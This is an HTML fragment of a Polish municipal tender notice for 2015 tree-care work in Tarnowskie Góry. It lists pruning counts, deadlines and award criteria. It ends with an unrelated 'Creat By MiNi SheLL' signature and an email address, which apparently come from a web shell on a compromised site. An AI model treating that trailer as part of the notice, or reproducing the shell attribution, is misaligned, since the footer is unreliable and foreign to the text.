<li>2. wysokość kary umownej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie zabiegów pielęgnacyjno - konserwatorskich starodrzewu zabytkowego parku w Tarnowskich Górach - Reptach w 2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zabiegów pielęgnacyjno - konserwatorskich starodrzewu zabytkowego parku w Tarnowskich Górach - Reptach w 2015 r. polegających na wykonaniu cięć sanitarnych i technicznych 119 szt. drzew różnych gatunków rosnących w obrębie Parku w Reptach, głównie wzdłuż alejek parkowych, w tym:
1) cięcia sanitarne - 116 szt. drzew,
2) cięcia techniczne (skrajnia alejek) - 3 szt. drzew..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie zabiegów pielęgnacyjno-konserwatorskich starodrzewu alei lipowej i posadzenie drzew przy ul. Lipowej w Tarnowskich Górach w 2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zabiegów pielęgnacyjno-konserwatorskich starodrzewu alei lipowej i posadzenie drzew przy ul. Lipowej w Tarnowskich Górach w 2015r. w tym:
1) wykonanie różnych kombinacji cięć sanitarno-pielęgnacyjnych, korekcyjnych, redukcyjnych, technicznych,  prześwietlających pędy juwenilne połączone z usuwaniem gniazd jemioły, zamontowaniem w koronach drzew wiązań typu COBRAR lub równoważnych oraz odsłonięciem szyi korzeniowych i usunięciem odrostów korzeniowych, w tym:
     - cięcia pielęgnacyjno-sanitarne  - CPS - na 36 szt. drzew,
     - cięcia korekcyjne - KK - na 13 szt. drzew,
     - cięcia redukcyjne - Rh - na 14 szt. drzew, w tym:
- obniżenie korony o min. 2 m - 8 szt. drzew,
- obniżenie korony o min. 3 m -  3 szt. drzew,
- obniżenie korony o min. 4 m - 3 szt. drzew,
    - cięcia prześwietlające - prześwietlenie - 22 szt. drzew 
    - cięcia techniczne (skrajnia pozioma i pionowa od str. sąsiadującej posesji) - T - 2 szt. drzew,
    - zamontowanie w koronach 5 szt. drzew wiązań lub systemu wiązań dynamicznych lub statycznych typu COBRA R lub równoważnych - Wz - łącznie 9 szt. wiązań o wytrzymałości 2 lub 4 tony,
   - odsłonięcie szyi korzeniowej - odsłonięcie - 8 szt. drzew,
   - usunięcie gniazd jemioły z korony drzewa - jemioła - 10 szt. drzew,
   - usunięcie odrostów korzeniowych - odrosty - 10 szt. drzew,
2) posadzenie drzew lip drobnolistnych zakupionych przez Zamawiającego - 8 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com